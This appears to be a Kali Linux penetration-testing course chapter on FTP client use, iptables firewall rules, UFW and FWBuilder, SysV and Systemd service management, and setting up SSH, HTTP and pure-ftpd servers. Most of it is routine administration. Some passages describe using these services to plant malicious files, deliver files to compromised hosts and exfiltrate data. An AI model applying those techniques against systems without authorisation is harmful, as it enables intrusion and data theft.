FTP (File Transfer Protocol) is one of the oldest protocols still in use today. It is a very simple protocol to use for file transfers and can prove to be a treasure trove for a penetration tester and/or information security professional if the FTP server is misconfigured or the credentials are leaked. There are many instances where sensitive files on an FTP server have led to the compromise of a system. There are also many instances where an FTP server is used to upload files to a web server directory, which an attacker can leverage to place malicious files on the server.
File Transfers
In the following demonstrations, we have a local FTP server. The setup for this is out-of-scope, as the focus of this section is gaining familiarity with the FTP client against already configured FTP servers. Before beginning, let’s take a look at two helpful options for the ftp client. The -v option shows all responses from the FTP server, which can be useful in debugging any connectivity issues. The -n option prevents auto-login: when auto-login is enabled, the client attempts to log into the server as the current local user, which prevents specifying a different username and password.
The easiest way to access a FTP server is through anonymous access. This is when the user is anonymous and a password is not needed. Anything can be entered in as the password, and the login will be accepted. This is one of the most insecure configurations, as it allows anyone to log into the FTP server. Let’s log in with anonymous access.
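A sketch of the login (the numeric responses shown are typical vsftpd replies and may differ on other servers):

$ ftp -v 127.0.0.1
Connected to 127.0.0.1.
Name (127.0.0.1:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.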
When using the -n option, the initial logging in is a bit different, as it doesn’t prompt for the username or password. Let’s go through this process to cover this difference in logging in.
As shown in the listing above, the username and password need to be entered before access is granted to the server. Let’s do that now.
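At the ftp> prompt, the user command supplies the credentials (server replies may vary):

ftp> user anonymous
331 Please specify the password.
Password:
230 Login successful.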
There’s a directory in the anonymous directory on the server. Let’s create a file and upload it to that directory. To do this, let’s change our current working directory to /var/tmp and create the file there.
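A sketch with an illustrative file name:

$ cd /var/tmp
$ echo "ftp upload test" > upload.txt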
Now that the file is created, we can log back into the FTP server and upload the file with the put command.
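The attempt would look like this:

ftp> put upload.txt
553 Could not create file.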
The file was not uploaded; the server displayed an error message of 553 Could not create file. Note that the pub directory is writeable by everyone. Let’s go into that directory and attempt the upload again.
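A sketch of the successful attempt (the 226 reply is the standard transfer-complete code):

ftp> cd pub
ftp> put upload.txt
226 Transfer complete.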
Let’s log in with a user account to the FTP server. We’ll use the kali user to do this.
It is important to note that this user account requires the correct password, unlike the anonymous account, which accepts any password or none at all. This login shows a user directory instead of the pub directory. There’s an interesting file in this directory, too. Let’s download the specialcredentials.txt file and take a look at its contents. To download a file from an FTP server, we’ll use the get command.
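A sketch of the download, followed by a quick look at the contents after exiting:

ftp> get specialcredentials.txt
ftp> exit
$ cat specialcredentials.txt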
Before concluding our coverage of FTP, let’s briefly talk about two subjects: Active vs. Passive FTP and Binary vs. ASCII modes. Active vs. Passive refers to how the data connection between client and server is established. FTP works in two channels: the command channel and the data channel. In both modes, the client opens the command channel from a random port to port 21 on the server (in a default configuration). In Active Mode, the FTP server then connects back from its port 20 to a random port on the client to form the data channel. In Passive Mode, the client sends a PASV command over the command channel; the server responds by opening a random port, and the client connects from a random port to that server port to form the data channel. Depending on how the FTP server is configured, the mode used by the client may need to be changed.
Binary vs. ASCII mode has to do with how the file is transferred. If the file is a text file, ASCII mode can be used. In a transfer from a UNIX system to a Microsoft system, ASCII mode will automatically add a ^M to the end of each line; in a transfer from a Microsoft host to a UNIX host, the ^M will be removed from each line ending. This ensures that a text file remains readable when moved from one type of system to another. Binary mode keeps the file in its original state, without modifying the line endings. If transferring a binary, Binary mode should be used; otherwise the binary may be corrupted by the newline modifications. Let’s quickly go over the FTP ascii and binary commands.
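Switching modes at the ftp> prompt looks like this (the numeric replies are typical server responses):

ftp> ascii
200 Switching to ASCII mode.
ftp> binary
200 Switching to Binary mode.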
ACLs Overview and Netfilter Introduction (iptables -L)
Before we can cover basic firewall configurations, it is important to understand what an Access Control List (ACL) is. An ACL is a list of rules to control access to computer resources. This can be either in the filesystem or network. For the case of this section, we’ll strictly be covering network ACLs.
A network ACL will typically have three actions it can take. These would be ACCEPT, DROP, or REJECT. Let’s look at a firewall like a guest list at a fancy party. When someone arrives at the party doors, the guest list is checked. If they are on that list under ACCEPT, they are let inside. If they are not on the list, they won’t be allowed in the party. This would be the same as DROP. Let’s pretend there’s a special category of unwelcome guests that may show up. This would fall under the REJECT list, where an explanation is given to the guest that is not allowed in. “Sir, last time we invited you, you ate all the food and didn’t leave any for anyone else.” Not only would this guest not be allowed in, but a response message is provided by the staff member controlling entry at the door.
Firewalls also have a default policy. In this example, the default policy is a DROP (not allow) policy. This means that anyone who isn’t on the list is not allowed in the party. If the policy were a default ACCEPT, only those on the DROP or REJECT list would be kept out of the party. When it comes to network traffic, a default ACCEPT policy is the easiest to manage, since many unknown connections may need to reach a networked device; however, it is much less secure than a default DROP policy, where access is explicitly defined for only trusted devices on the network. The ACL is read from top to bottom, and the rules are applied in the order in which they are read. This being said, if a rule explicitly allows a type of traffic through and a later rule drops that same type of traffic, the traffic will be allowed. It doesn’t matter that there are conflicting rules on the same match; the firewall takes the first action that matches the rules.
The direction of this traffic also needs to be considered. Most times, people think only of traffic coming from the outside of a network to internal network resources. Firewalls also handle the internal network access and can even be what is known as stateless or stateful.
The state, in this case, is the origination of a network session that is established. The firewall monitors the network traffic and allows sessions that were permitted to remain permitted. If a user opens a network session from the internal network to an outside resource and the traffic is allowed, the session state is stored in the firewall records, and any further communication between that internal host and the remote resource is allowed as long as the session remains open. This takes more computing resources on the firewall and can be considered a more robust way to manage network traffic. iptables is a stateless firewall by default, but it can be made stateful if desired.
For the sake of keeping this at a basic level, this will not be in scope for this course. It is more important that it is understood that state can play a role in how some firewalls are configured.
The Linux kernel has a packet filtering framework, called netfilter. The utility that hooks into this framework is iptables. iptables is used to create and/or modify ACLs for the Linux firewall. Let’s take a look at the default iptables listing.
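The command to list the rules:

$ sudo iptables -L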
iptables has multiple tables to store different types of ACLs. The default table is called the filter table. This is the only table that we will cover in this course, but you should be aware that the following tables also exist within iptables. The following was taken directly from the manpage of iptables.
filter: This is the default table (if no -t option is passed). It contains the built-in chains INPUT (for packets destined to local sockets), FORWARD (for packets being routed through the box), and OUTPUT (for locally-generated packets).
nat: This table is consulted when a packet that creates a new connection is encountered. It consists of four built-ins: PREROUTING (for altering packets as soon as they come in), INPUT (for altering packets destined for local sockets), OUTPUT (for altering locally-generated packets before routing), and POSTROUTING (for altering packets as they are about to go out). IPv6 NAT support is available since kernel 3.7.
mangle: This table is used for specialized packet alteration. Until kernel 2.4.17 it had two built-in chains: PREROUTING (for altering incoming packets before routing) and OUTPUT (for altering locally-generated packets before routing). Since kernel 2.4.18, three other built-in chains are also supported: INPUT (for packets coming into the box itself), FORWARD (for altering packets being routed through the box), and POSTROUTING (for altering packets as they are about to go out).
raw: This table is used mainly for configuring exemptions from connection tracking in combination with the NOTRACK target. It registers at the netfilter hooks with higher priority and is thus called before ip_conntrack, or any other IP tables. It provides the following built-in chains: PREROUTING (for packets arriving via any network interface) and OUTPUT (for packets generated by local processes).
security: This table is used for Mandatory Access Control (MAC) networking rules, such as those enabled by the SECMARK and CONNSECMARK targets. Mandatory Access Control is implemented by Linux Security Modules such as SELinux. The security table is called after the filter table, allowing any Discretionary Access Control (DAC) rules in the filter table to take effect before MAC rules. This table provides the following built-in chains: INPUT (for packets coming into the box itself), OUTPUT (for altering locally-generated packets before routing), and FORWARD (for altering packets being routed through the box).
In the default table (filter), INPUT, FORWARD, and OUTPUT are displayed. These are called chains and define the direction of network traffic flow. INPUT is related to any connection that is coming into the host. OUTPUT is for any connection leaving the host. FORWARD is related to how to redirect network traffic, and will commonly be used in a Linux router configuration. There are more chains in other tables, but those are out-of-scope for this course.
The default policy for each of the chains in the listing are set to ACCEPT, so we can consider the firewall to be completely open. The other policies that can be used are the actions that were mentioned earlier. The possible policies would be ACCEPT, DROP, and REJECT. Let’s change the default policy for the FORWARD chain to DROP, since our Kali host is not going to function as a router. We do this with the -P option for the policy.
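The policy change and a follow-up listing:

$ sudo iptables -P FORWARD DROP
$ sudo iptables -L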
Now that we have a basis of terms and can list the rules in the default table, let’s move on to creating the rules that make up the firewall. Having an understanding that the host has multiple network paths - INPUT (traffic going into the host), OUTPUT (traffic coming out of the host), and FORWARD (traffic that is routed in the host) - is critical in understanding the nature of traffic that we will allow, reject, or drop.
IPTables (Parameters, Modifying Rules with -A/-D/-I)
Covering firewalls as a concept would be useless without analyzing a few rules. Beyond this, it is much stronger if we know how to set iptables and have the capability of setting up the firewall. Let’s build on what we learned about ACLs, default policies, actions, and listing the firewall rules on a Linux host.
To begin, let’s define some important iptables options. These are used to set the rules of the firewall.
The -p option defines what protocol is to be considered in the rule. The most common protocol types are tcp, udp, and icmp traffic. The all parameter can be passed to the option to cover all possible protocols, as well.
The -s option defines the source address in the connection. The parameter can be a network name, hostname, a network IP address with a /mask value, or simply an IP address of a host. This is the location the network traffic is coming from.
The -d option defines the destination address in the connection. The parameter for the destination also follows the syntax options for the -s option. This is the location the network traffic is going to.
The -i and -o options define the interfaces involved in the connection. -i is for the interface that the connection is going in, and -o is the interface going out. These options will not be covered further in this section, as they are more related to routing and working with the FORWARD chain. It is still useful to know these options as they relate to firewall traffic flow.
Knowing these options alone cannot get us all the way to configuring the firewall rules. We also need to cover how to add, check, delete, insert, and replace rules in the chains.
The -A option is used to append a rule to the chain entered as the parameter. This will add the rule to the end of the rules already in the chain.
The -C option is used to check if the rule is already in the chain. This helps prevent duplicate entries in a chain.
The -D option is used to delete a rule from a chain and can use the rule-specification or the line number.
The -I option is used to insert a rule in a chain using a line number and then the rule-specification to insert in place for that line number. The other rules below that line entry will shift by one, so be careful when inserting multiple rules one after the other.
The -R option is used to replace a rule in a chain using a line number and then the rule-specification to replace the entry in that line. This is different than -I in that the other rule line numbers will not change and the value of the entry line number chosen will be replaced with the new value. Be careful not to replace the wrong entry, as that will remove the rule from the chain.
Now that we have the important options covered, let’s work with adding some firewall rules with iptables. For the following demonstrations, the IP addresses used will be arbitrary. This is meant to demonstrate how to work with the iptables utility.
For the sake of this activity, let’s add some more arbitrary rules to the INPUT chain. Let’s add the localhost IP, 127.0.0.1, as the source and destination. Let’s also add the IP address of 192.168.1.37 as the source with the TCP protocol.
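The two commands, matching the rules just described:

$ sudo iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1
$ sudo iptables -A INPUT -p tcp -s 192.168.1.37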
Let’s now append another firewall rule for the name localhost and see what happens. For this, let’s just add it as the source address.
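The append and a listing to observe the result:

$ sudo iptables -A INPUT -s localhost
$ sudo iptables -L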
Notice that the first time, we added the literal IP for the localhost, 127.0.0.1. That rule-specification resolved to localhost in the sudo iptables -L output. When we used localhost as the source address in this last command execution, there are now two entries with the same information. This is because localhost resolves to both the IPv4 address and the IPv6 address, and those addresses resolve back to localhost in the output. Let’s take a look at deleting these duplicate lines we just added.
The command to delete the duplicate rule ended up removing both of the rules. It didn’t delete the other rule with localhost, since the destination specification was different between the rules added in the last command and the rule-specification added previously. Let’s append that rule again and list it with the --line-numbers option.
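A sketch of those two steps:

$ sudo iptables -A INPUT -s localhost
$ sudo iptables -L --line-numbers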
Now we can see the line numbers in the output. If we use the line number to delete one of the duplicate entries, we can avoid removing all entries that fit the same rule-specification. Let’s do this now.
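Assuming the duplicate sits at line 2 of the INPUT chain (check your own --line-numbers output first):

$ sudo iptables -D INPUT 2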
It is important to note that firewalls work from the top of the list and go to each next line until a match is found. This being said, if there are conflicts between rules, the first line read will be the one used in the firewall configuration. If we look at the output again, we can see there may be a current conflict with the 192.168.1.0/24 network and the 192.168.1.37 host. Let’s insert the rule-specification for 192.168.1.37 to line 1 and then delete the duplicate entry that already was in the list.
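A sketch of the two steps; the line number of the old duplicate depends on your own listing:

$ sudo iptables -I INPUT 1 -p tcp -s 192.168.1.37
$ sudo iptables -L --line-numbers
$ sudo iptables -D INPUT 4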
We can also show the amount of traffic in terms of packets and bytes with the -v option. Let’s take a look at what the traffic data is currently. In the command, we can also add the -n option to only display the IP addresses, instead of the canonical names. The output in your terminal session will be different.
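The combined listing command:

$ sudo iptables -vnL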
Let’s generate some network traffic from our localhost to our localhost with the ping utility. After the ping, let’s look at the traffic amount again. Again, your output results will be different than the listing shown.
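The two steps:

$ ping -c 2 127.0.0.1
$ sudo iptables -vnL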
One last thing before we move on: iptables rules are not persistent across a reboot. The rules must be saved with the iptables-save command (and can later be reloaded with iptables-restore). Let’s go ahead and save the current rules now.
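One common approach is to redirect the output to a file that can later be fed to iptables-restore; the file path here is an assumption, as distributions differ on where persistent rules live:

$ sudo sh -c 'iptables-save > /etc/iptables.rules'
$ sudo sh -c 'iptables-restore < /etc/iptables.rules'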
Now that we covered how to work with adding rules to the firewall and modifying those, let’s take a look at refining these rules further to make a more practical firewall.
IPTables (Extended Rules and Default Policies)
Extended rules make the firewall more practical for filtering traffic based on multiple conditions. These are important to understand if the network traffic needs to be considered when creating the firewall ruleset.
In the last section, we took a look at the process of adding, removing, and inserting rules within a chain in the iptables. If, while working through the demonstration, you thought, “These rules don’t look like they do anything,” you’d be absolutely right! The default policy on the INPUT chain is ACCEPT, and the rules we added followed that default policy. Since the action wasn’t added in the commands we entered, the default policy action is inherited. Even if we changed the default policy to a different action with the -P option, the rules in the chain would still inherit that policy action.
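For reference, changing a chain’s default policy uses the -P option. Be careful setting DROP over a remote session, as it can cut off your own connection if no ACCEPT rule covers it:
$ sudo iptables -P INPUT DROP    # default-deny anything that matches no rule
$ sudo iptables -P INPUT ACCEPT  # revert to the default-accept behavior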
Let’s take another look at the iptables we have set up already. Again, your output may appear differently than the demonstration.
In the rule listing, let’s suppose that we want to drop all traffic from the 192.168.1.0/24 network but still allow the host at 192.168.1.37. Let’s replace the rule for the network and add the DROP target with the -j option.
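Assuming the network rule sits at line 2 (check your own --line-numbers output), the replacement might look like:
$ sudo iptables -R INPUT 2 -s 192.168.1.0/24 -j DROP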
As shown in the listing above, the target changed to DROP for the 192.168.1.0/24 network. Since firewalls work by reading the first rule and moving to the next until a match is found, the 192.168.1.37 host will still have access to our host. Let’s refine this host’s access to only TCP port 8080 on our localhost. Again, we’ll use the replace option (-R) for this line entry. To specify the port, we will use the --dport (destination port) option.
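Assuming the host rule is at line 1, a sketch of the replacement:
$ sudo iptables -R INPUT 1 -s 192.168.1.37 -p tcp --dport 8080 -j ACCEPT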
If the source port is known and is relevant to a firewall rule, the --sport option can be used to specify that. There is another option that can be used to create rules based on the type of connection made. This option is part of the conntrack module, which is loaded with the -m conntrack option. The relevant option from this module is --ctstate, which is part of the iptables-extensions package. There are more connection tracking states than those listed below, but here are some important connection states. Note that on older Linux kernels, this would show as --state instead of --ctstate.
INVALID: The packet is associated with no known connection.
NEW: The packet has started a new connection or is otherwise associated with a connection that has not seen packets in both directions.
ESTABLISHED: The packet is associated with a connection that has seen packets in both directions.
RELATED: The packet is starting a new connection, but is associated with an existing connection, such as an FTP data transfer or an ICMP error.
UNTRACKED: The packet is not tracked at all, which happens if you explicitly untrack it by using -j CT --notrack in the raw table.
Utilizing conntrack makes iptables a stateful firewall.
To ensure that packets that are part of an existing or related connection are accepted, let’s insert the following as a new rule.
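A sketch of that rule, inserted at the top of the INPUT chain:
$ sudo iptables -I INPUT 1 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT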
It’s a good practice to add a DROP action for any packet that has an INVALID connection state. Let’s start by inserting this rule at the beginning of the INPUT chain. Your output may appear different than the demonstration, but the first rule should look the same.
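The corresponding command might look like this; after it runs, the DROP rule for INVALID states becomes rule 1:
$ sudo iptables -I INPUT 1 -m conntrack --ctstate INVALID -j DROP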
With this configuration of the firewall rules, any traffic that originates from our host will be accepted back into our host. The INVALID connections will immediately be dropped, as well.
Now that we covered extended rules, default policies, additional options, and creating a stateful firewall with iptables, you should now have the knowledge to create custom rule sets to satisfy a network’s or host’s firewall needs.
UFW and FWBuilder
Sometimes, it’s easier to have a frontend interface to handle the firewall rules. There are two tools that we can use to accomplish this: UFW (Uncomplicated Firewall) and FWBuilder. Both of these tools are simply frontend interfaces that leverage the power of iptables.
First, let’s look more at UFW. We can install this with sudo apt install ufw.
Now that UFW is installed, we can check the status of the firewall with the sudo ufw status command. Let’s go ahead and do this.
The power of UFW lies in its convenience of use. It is a simple tool to add firewall rules. This can be done based on the applications installed on a host. To view the list of applications installed on the host that UFW can affect, run the sudo ufw app list command. Your output may be different than the demonstration.
SSH is highlighted in the listing. We can get more information about this application with the sudo ufw app info SSH command. Note that case-sensitivity may affect the tool’s output.
To allow traffic through the firewall related to the application, we can use the allow directive. Let’s allow SSH to the firewall rules.
Now that SSH is added to the host firewall, the firewall needs to be enabled.
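The allow, enable, and verification steps described above can be sketched as:
$ sudo ufw allow SSH
$ sudo ufw enable
$ sudo ufw status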
As shown in the listing, SSH is allowed on the host firewall from Anywhere. This is only a basic coverage of the ufw tool. Before moving on to FWBuilder, let’s disable UFW with the sudo ufw disable command.
With UFW disabled, we can quickly look at FWBuilder and the GUI interface it has to offer.
To use fwbuilder, enter sudo fwbuilder. Your output may be different than the demonstration.
The GUI interface is a drag-and-drop interface. This is especially convenient when rules are out of order and need to be moved around. The modifications of rules are done in the lower Editor portion of the screen. The Editor pane will change depending on what is selected in the Policy pane.
It may be important to note that fwbuilder can automatically translate IPv4 and IPv6 addresses, or rules can be specified to fit either need. When finished with building the firewall rules in the GUI interface, the rules can be compiled and installed on the host. The generated file from the compilation is a script that will execute the rules set for the platform specified. In the case of the demonstration, the platform is iptables.
Managing Network Services
It is important to know and understand how services work on Linux systems. These services make up the capabilities of a host or network and can be leveraged to gain more privileges on a host or gain access to another host on a network. Beyond the benefits of understanding this from a security perspective, it is also valuable for a Linux System Administrator to know how to work with services on a system to ensure full system functionality. In this section, we’ll be looking at two variations of Linux services: SysV Init and Systemd.
SysV (service, init)
The service type, called SysV Init, is the legacy version of how Linux services work. Despite being considered legacy, it is still widely in use, and Systemd is backward compatible with it. To best understand how services are run on a system, it is important to define what runlevels are. Runlevels are designations that define what state a Linux system starts into and which services are running in that state. They are divided into 7 categories.
0 - is the system state when it is halted - or powered off. This is not an effective runlevel, but it can be called on to execute a system shutdown.
1 - is known as Single User Mode. This is the state where only one user (root) can log into the system to conduct administrative tasks. Networking is disabled for this runlevel. The command-line interface is used.
2 - is Multiuser Mode. The network is disabled and the command-line interface is used.
3 - is Multiuser Mode with Networking. The command-line interface is used.
4 - is an Undefined Mode by default. This is available if a custom runlevel is wanted.
5 - is Multiuser Mode with a Graphical User Interface. Networking is also enabled. This is the default runlevel on any Linux distribution that is using a GUI.
6 - is the runlevel to restart the Linux host. This is another runlevel that is not effective, but it can be called on to execute a system restart.
To display the current working runlevel, the runlevel command can be entered in the terminal. Let’s do this to see the current runlevel of our Kali host.
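The output shows the previous and current runlevels; on a host sitting at Runlevel 5, for example, it would look like the following, where N means there is no previous runlevel:
$ runlevel
N 5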
The configuration to set a Linux system’s default runlevel is /etc/inittab. Let’s take a look at a typical /etc/inittab file. It is important to know that Kali does not use SysV Init, so many of the concepts in this section will not be present in our Kali installation. For the following demonstration, a legacy version of Ubuntu is used to be able to showcase the concepts we are covering.
This /etc/inittab file is from an Ubuntu 6.06 installation. In the listing above, several entries are highlighted. The id:2:initdefault: line is the default runlevel for this host. The format for these lines is unique identifier:runlevel:action:process. For this installation, the default runlevel is Runlevel 2. In the si::sysinit:/etc/init.d/rcS line, the unique identifier is si. There is no associated runlevel. The action to take is sysinit. The process is /etc/init.d/rcS, which is a script that will execute when this identifier is called.
To change the current runlevel to a different one, we can use the init (or telinit) command - the runlevel command itself only displays the current state. If we wanted to change the runlevel to Runlevel 3, for instance, we would enter init 3. To avoid breaking our connection with the Kali host, let’s not do this. Regardless of us not exercising a runlevel change, be aware of how to do it.
Each runlevel will have a respective /etc/rc#.d/ directory associated with it. This is used to add the services that will be started for that runlevel in the form of scripts. Let’s take a look at /etc/rc2.d/ on this Ubuntu host.
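Listing the directory shows the scripts; their names follow an S##name form, and the number controls startup order:
$ ls /etc/rc2.d/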
In the listing above, 6 startup (S) scripts are shown. These are run in alphanumeric order as the system enters the Runlevel 2 state.
The service scripts are located in /etc/init.d/ by default on a SysV Init system. Let’s take a look at what scripts are available on the Ubuntu host.
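A simple listing is enough here:
$ ls /etc/init.d/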
In the listing above, ssh is included in the listing. We can work with services, outside of runlevels, by manually executing the scripts in the /etc/init.d/ directory. Let’s start the ssh service.
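On the Ubuntu host, that looks roughly like the following; the output line is paraphrased and may differ by version:
$ sudo /etc/init.d/ssh start
 * Starting OpenBSD Secure Shell server...          [ ok ]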
The ok response states that the ssh service was started and is running. There are many other possibilities for service actions. Let’s execute the ssh script without a parameter to see the actions we may be able to take.
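Running the script with no parameter typically prints a usage line such as:
$ sudo /etc/init.d/ssh
Usage: /etc/init.d/ssh {start|stop|reload|force-reload|restart}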
It is important to note that not all service scripts will have a Usage displayed when the script is executed in an unaccepted way. This example is to demonstrate that {start|stop|reload|force-reload|restart} can be added to the script execution to take different actions with the service.
Let’s shift our focus back to our Kali host to cover one last thing about SysV Init: the service command. Even though on a Systemd host this technically isn’t the SysV Init service utility, the functionality remains the same as though it were. The syntax for the service utility is service service-name {start|stop|status}. Let’s start, get the status of, and stop the ssh service on our Kali host.
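In practice:
$ sudo service ssh start
$ sudo service ssh status
$ sudo service ssh stop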
The listing shows that the service is running after we execute the start action. This is very similar to the ssh script shown in the /etc/init.d/ directory previously. service is considered to be a legacy command, and it is becoming less common to see SysV Init systems in the wild.
Systemd (systemctl)
Most Linux systems today are using a service startup system called Systemd. With this usage, it is important to understand how the services are managed. This section will cover how to determine if a Linux system is using Systemd, how to work with system services, why Linux moved away from SysV Init, and the similarities between the two.
Before moving into the details of Systemd, let’s figure out if Kali is using Systemd. To do this, we can look at the first process that was created on the Linux host. We can do this with the ps 1 command.
/sbin/init is historically a process that is used by SysV Init. Let’s look at that file to see what it is. We’ll use the file command to do this.
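The two checks together, with the symbolic link resolution we would expect to see on Kali:
$ ps 1
$ file /sbin/init
/sbin/init: symbolic link to /lib/systemd/systemd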
In the listing above, we can determine that our Kali host is using Systemd since the /sbin/init file is a symbolic link to /lib/systemd/systemd and is the first process used to initialize the system on startup.
Systemd uses a utility called systemctl to control it. This is very similar to the service utility, but the syntax is reversed for the service-name and action. Let’s take ssh as an example and start this on our host with systemctl.
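For example:
$ sudo systemctl start ssh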
Since there wasn’t an error output to our screen, we can expect that the ssh service is up and running. There are several other actions that can be taken with the systemctl utility, as well. The following are some important actions.
- stop will stop a service.
- status will show the running status of a service.
- reload will reload the configuration files for a service without the need to stop the service.
- enable/disable will mark the service to run at a system boot or not.
Let’s verify the status of the ssh service.
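The status action listed above does this:
$ sudo systemctl status ssh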
In SysV Init, we covered the concept of the 7 runlevels. We also looked at how runlevels were handled in the /etc/rc#.d/ directories and how the scripts would execute in alphanumeric order. Systemd improved upon this design through the utilization of target-units. Target-units are very similar in concept to runlevels, in that they define what services run at each target-unit level. Unlike runlevels, there is more flexibility to define more than 7 classifications. Let’s take a look at our Kali host’s target-units with the systemctl utility. Your host may appear different than the demonstration.
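The target-units can be listed with the following command; the counts and names will vary per host:
$ systemctl list-units --type=target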
In the case of the listing above, there are currently 35 loaded units listed. This is much more dynamic than the limited 7 in SysV Init runlevels. There are also three categorizations for each target-unit: LOAD, ACTIVE, and SUB.
LOAD specifies if a target-unit is loaded in the Linux host. This means the system can read the unit configuration file. If it is loaded, it can be called on to change the target-unit behavior of the system. This can be used to take actions such as enabling/disabling network services on a system.
ACTIVE specifies if a particular target-unit is currently active or not. This does not necessarily mean that a set of services is running under that target, but the target-unit was run if it says active.
SUB specifies the status of the services running under a target-unit. Some service types can run a single time and are not continuous. This may show as exited. If a service is continuous and running, active will be shown under this field. If the process associated with the service is not running, dead will be shown in this field.
A benefit of target-units is that they can be run in parallel; it isn’t a choice of one or the other. They do not need to be started or stopped in a sequenced order, like the /etc/rc#.d/ directories. There’s also the advantage of supplying dependencies (conditions that need to be met before an operation) within the target services. These will automatically start the dependencies or exit with an error if a dependency cannot be met. The target-units and services can be found in /usr/lib/systemd/system/. Let’s take a look at one of the service files in this directory.
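A trimmed sketch of what a Debian-style ssh.service unit file typically contains; the exact lines vary by version:
$ cat /usr/lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
After=network.target auditd.service

[Service]
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
ExecReload=/bin/kill -HUP $MAINPID

[Install]
WantedBy=multi-user.target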
The After line is how Systemd handles dependencies in services. A Before line could also be added if this service needed to start before another target-unit. The ExecStart line is the script execution to start the service. The WantedBy line defines which target this service should be included in. In the case of the listing example, the ssh service is included in the multi-user.target target-unit.
Despite there being so many target-units, there is still a correlation between runlevels and target-units. Let’s execute the following command on our Kali host to see how the target-units relate to runlevels.
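One way to see the mapping is to list the runlevel compatibility targets, which are symbolic links to the corresponding Systemd targets (output trimmed to the link names):
$ ls -l /usr/lib/systemd/system/runlevel*.target
runlevel0.target -> poweroff.target
runlevel1.target -> rescue.target
runlevel2.target -> multi-user.target
runlevel3.target -> multi-user.target
runlevel4.target -> multi-user.target
runlevel5.target -> graphical.target
runlevel6.target -> reboot.target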
There is much more to Systemd than what we covered here. We covered services and target-units with Systemd, but there are other types such as mount, link, socket, device, and more. These are not as important to understand as the concept of services and how it relates to the legacy SysV Init system.
SSH
The Secure Shell (SSH) service is most commonly used to remotely access a computer, using a secure, encrypted protocol. However, as we will see later on in the course, the SSH protocol has some surprising and useful features, beyond providing terminal access. The SSH service is TCP-based and listens by default on port 22. To start the SSH service in Kali, type the following command into a Kali terminal.
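As covered in the Systemd section:
$ sudo systemctl start ssh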
We can verify that the SSH service is running and listening on TCP port 22 by using the netstat command and piping the output into the grep command to search the output for sshd.
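A sketch of the check; the PID shown is illustrative:
$ sudo netstat -antp | grep sshd
tcp   0   0 0.0.0.0:22   0.0.0.0:*   LISTEN   1234/sshd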
If, like many users, you want to have the SSH service start automatically at boot time, you need to enable it using the systemctl command as follows. The systemctl command can be used to enable and disable most services within Kali Linux.
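For example:
$ sudo systemctl enable ssh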
Unless ssh is used very often, we advise that the ssh service is started and stopped as needed. As such, we can disable the service to prevent it from starting at boot time.
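And to disable it:
$ sudo systemctl disable ssh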
Now that we know how to start the ssh service, we can utilize ssh to gain access to our host from other machines.
HTTP
The HTTP service can come in handy during a penetration test, either for hosting a site, or providing a platform for downloading files to a victim machine. The HTTP service is TCP-based and listens by default on port 80. To start the HTTP service in Kali, type the following command into a terminal.
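The HTTP service on Kali is apache2, as the next steps confirm, so the start command is:
$ sudo systemctl start apache2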
As we did with the SSH service, we can verify that the HTTP service is running and listening on TCP port 80 by using the netstat and grep commands once again.
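Again, the output shown is illustrative:
$ sudo netstat -antp | grep apache2
tcp6   0   0 :::80   :::*   LISTEN   2345/apache2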
There is a much more common way to create a temporary web server, which uses python. It is useful to have a temporary solution that runs on demand without worrying about exposing ports on our Kali host that we don’t need. Before we can show that on port 80, we’ll need to stop the apache2 service. Let’s do that now.
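$ sudo systemctl stop apache2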
Now that we won’t have a port conflict on port 80, let’s use the python module SimpleHTTPServer to start the web service with python.
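SimpleHTTPServer is the Python 2 module name; on a Python-3-only host, the equivalent is python3 -m http.server 80. Binding port 80 requires root privileges:
$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...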
The terminal session hangs after the execution of this command. This is because the application is running in the foreground. When we are finished with our web service needs, we can simply enter Ctrl + C.
Now that we covered two ways to start a web server, we can utilize this on penetration test engagements to download files into a compromised host.
FTP (pure-ftpd)
FTP is a great way to transfer files from one host to another quickly. This can be used to share files on the same network or even used to exfiltrate files from compromised machines. We covered the FTP client previously, so let’s move on to creating a simple FTP server on our Kali host.
Let’s quickly install the Pure-FTPd server on our Kali attack machine. If you already have an FTP server configured on your Kali system, you may skip these steps.
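For example:
$ sudo apt update && sudo apt install pure-ftpd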
Before any clients can connect to our FTP server, we need to create a new user for Pure-FTPd. The following Bash script will automate user creation for us:
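The original script isn’t reproduced here, so the following is one possible version, assuming Pure-FTPd’s PureDB virtual-user backend. The group, user, and directory names are illustrative, and pure-pw prompts for the password interactively; run the script as root (via sudo):
#!/bin/bash
# Create a system group and user to own the FTP files.
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /usr/sbin/nologin ftpuser
# Create the FTP root and hand it to the service account.
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome
# Create the virtual user offsec (prompts for a password) and build the user database.
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
# Enable the PureDB authentication backend and restart the service.
ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/60pdb
systemctl restart pure-ftpd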
We will make the script executable, then run it and enter “lab” as the password for the offsec user when prompted:
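Assuming the script above was saved as setup-ftp.sh (the filename is an assumption), the steps look like:
$ chmod +x ./setup-ftp.sh
$ sudo ./setup-ftp.sh
Password:
Enter it again: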
Now that we have our FTP server set up, we can leverage this with the username and password we added when creating the server. As always, only run this service when you need it and stop it when you don’t.
Relevant Note(s): Linux Basics